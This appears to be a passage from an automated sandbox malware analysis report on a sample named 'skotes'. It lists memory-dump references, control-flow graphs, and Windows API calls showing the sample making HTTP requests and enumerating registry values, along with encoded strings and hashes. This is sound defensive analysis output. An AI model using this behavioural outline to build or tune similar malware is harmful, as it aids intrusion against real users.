                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InformationTimeZone
                                                                                                                                                                                                                                              • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                              • API String ID: 565725191-239921721
                                                                                                                                                                                                                                              • Opcode ID: 19884379f9c1ebbbd3a913964efab69212488cc1cb1edf80a613ec5d486e951d
                                                                                                                                                                                                                                              • Instruction ID: e49d94a7f6feee81a37189f968de0de165511f974d82787951079a134be285f1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 19884379f9c1ebbbd3a913964efab69212488cc1cb1edf80a613ec5d486e951d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 89C11479A00205AFDB24EF68DC41BEE7BA9EF47314F244059E8A0972D1E7318E91F750

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00BDEB51
                                                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(00000000), ref: 00BDEC83
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00BDED98
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AttributesFile$CreateDirectory
                                                                                                                                                                                                                                              • String ID: mxo1L0x$#$111$246122658369$9c9aa5$FCQgKF==$FisgLnsCZO1i$GiQaT29tduF=$UA==$WDw=$WTs=$invalid stoi argument$stoi argument out of range
                                                                                                                                                                                                                                              • API String ID: 1875963930-2267310118
                                                                                                                                                                                                                                              • Opcode ID: 9d6a6a1bba17ba24cc29c8455440125bb8a4e4ccef01fb05b20b8e09f7bfdd03
                                                                                                                                                                                                                                              • Instruction ID: 2c0fcb48e2ef0cf540fac593a0baaf4f44c538f12f5c3207886e0941a9d4d882
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d6a6a1bba17ba24cc29c8455440125bb8a4e4ccef01fb05b20b8e09f7bfdd03
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B5F28C71A101849BEF18DB38CD8979DBBF29F46304F1082E9E409A73D6DB759AC4CB91

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1240 bdbe30-bdbe7c 1241 bdc281-bdc2a6 call be80c0 1240->1241 1242 bdbe82-bdbe86 1240->1242 1247 bdc2a8-bdc2b4 1241->1247 1248 bdc2d4-bdc2ec 1241->1248 1242->1241 1244 bdbe8c-bdbe90 1242->1244 1244->1241 1246 bdbe96-bdbf2a Sleep InternetOpenW InternetConnectA call be7a00 call bd5c10 1244->1246 1270 bdbf2c 1246->1270 1271 bdbf2e-bdbf4a HttpOpenRequestA 1246->1271 1250 bdc2ca-bdc2d1 call bed663 1247->1250 1251 bdc2b6-bdc2c4 1247->1251 1252 bdc238-bdc250 1248->1252 1253 bdc2f2-bdc2fe 1248->1253 1250->1248 1251->1250 1255 bdc34f-bdc354 call c06c6a 1251->1255 1259 bdc256-bdc262 1252->1259 1260 bdc323-bdc33f call becff1 1252->1260 1257 bdc22e-bdc235 call bed663 1253->1257 1258 bdc304-bdc312 1253->1258 1257->1252 1258->1255 1266 bdc314 1258->1266 1267 bdc319-bdc320 call bed663 1259->1267 1268 bdc268-bdc276 1259->1268 1266->1257 1267->1260 1268->1255 1276 bdc27c 1268->1276 1270->1271 1277 bdbf4c-bdbf5b 1271->1277 1278 bdbf7b-bdbfea call be7a00 call bd5c10 call be7a00 call bd5c10 1271->1278 1276->1267 1280 bdbf5d-bdbf6b 1277->1280 1281 bdbf71-bdbf78 call bed663 1277->1281 1292 bdbfec 1278->1292 1293 bdbfee-bdc004 HttpSendRequestA 1278->1293 1280->1281 1281->1278 1292->1293 1294 bdc035-bdc05d 1293->1294 1295 bdc006-bdc015 1293->1295 1298 bdc05f-bdc06e 1294->1298 1299 bdc08e-bdc0af InternetReadFile 1294->1299 1296 bdc02b-bdc032 call bed663 1295->1296 1297 bdc017-bdc025 1295->1297 1296->1294 1297->1296 1301 bdc084-bdc08b call bed663 1298->1301 1302 bdc070-bdc07e 1298->1302 1303 bdc0b5 1299->1303 1301->1299 1302->1301 1306 bdc0c0-bdc170 call c04250 1303->1306
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Sleep.KERNEL32(000005DC,845AEA34,?,00000000), ref: 00BDBEB8
                                                                                                                                                                                                                                              • InternetOpenW.WININET(00C28DC8,00000000,00000000,00000000,00000000), ref: 00BDBEC8
                                                                                                                                                                                                                                              • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00BDBEEC
                                                                                                                                                                                                                                              • HttpOpenRequestA.WININET(?,00000000), ref: 00BDBF36
                                                                                                                                                                                                                                              • HttpSendRequestA.WININET(?,00000000), ref: 00BDBFF5
                                                                                                                                                                                                                                              • InternetReadFile.WININET(?,?,000003FF,?), ref: 00BDC0A7
                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 00BDC187
                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 00BDC18F
                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 00BDC197
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSendSleep
                                                                                                                                                                                                                                              • String ID: 8HJUeIfzLo==$8HJUeMD Lq5=$RE1NXF==$invalid stoi argument$stoi argument out of range
                                                                                                                                                                                                                                              • API String ID: 2167506142-885246636
                                                                                                                                                                                                                                              • Opcode ID: 8808f6ec3a4d83b446dd6ba418287f7617595f7eb586ee792e36d09eee899b9a
                                                                                                                                                                                                                                              • Instruction ID: d840e086306bbab56170b9461311048b5cb03936d200cbf7ba8a40e8244e479d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8808f6ec3a4d83b446dd6ba418287f7617595f7eb586ee792e36d09eee899b9a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8EB1F4B16001199BDB28CF28CC85B9DBBB5EF45304F5041EAF509972D2EB709AC4CB95

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1686 bd6020-bd619d call bee150 call be80c0 * 5 RegOpenKeyExA 1699 bd64b1-bd64ba 1686->1699 1700 bd61a3-bd6233 call c040f0 1686->1700 1701 bd64bc-bd64c7 1699->1701 1702 bd64e7-bd64f0 1699->1702 1730 bd649f-bd64ab 1700->1730 1731 bd6239-bd623d 1700->1731 1704 bd64dd-bd64e4 call bed663 1701->1704 1705 bd64c9-bd64d7 1701->1705 1706 bd651d-bd6526 1702->1706 1707 bd64f2-bd64fd 1702->1707 1704->1702 1705->1704 1709 bd65d7-bd65df call c06c6a 1705->1709 1713 bd6528-bd6533 1706->1713 1714 bd6553-bd655c 1706->1714 1711 bd64ff-bd650d 1707->1711 1712 bd6513-bd651a call bed663 1707->1712 1711->1709 1711->1712 1712->1706 1721 bd6549-bd6550 call bed663 1713->1721 1722 bd6535-bd6543 1713->1722 1716 bd655e-bd6569 1714->1716 1717 bd6585-bd658e 1714->1717 1725 bd657b-bd6582 call bed663 1716->1725 1726 bd656b-bd6579 1716->1726 1727 bd65bb-bd65d6 call becff1 1717->1727 1728 bd6590-bd659f 1717->1728 1721->1714 1722->1709 1722->1721 1725->1717 1726->1709 1726->1725 1737 bd65b1-bd65b8 call bed663 1728->1737 1738 bd65a1-bd65af 1728->1738 1730->1699 1733 bd6499 1731->1733 1734 bd6243-bd6279 RegEnumValueA 1731->1734 1733->1730 1741 bd627f-bd629e 1734->1741 1742 bd6486-bd648d 1734->1742 1737->1727 1738->1709 1738->1737 1745 bd62a0-bd62a5 1741->1745 1742->1734 1746 bd6493 1742->1746 1745->1745 1748 bd62a7-bd62fb call be80c0 call be7a00 * 2 call bd5d50 1745->1748 1746->1733 1748->1742
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,80000001,0000043f,00000008,00000423,00000008,00000422,00000008,00000419,00000008), ref: 00BD617D
                                                                                                                                                                                                                                              • RegEnumValueA.KERNEL32(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 00BD6271
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
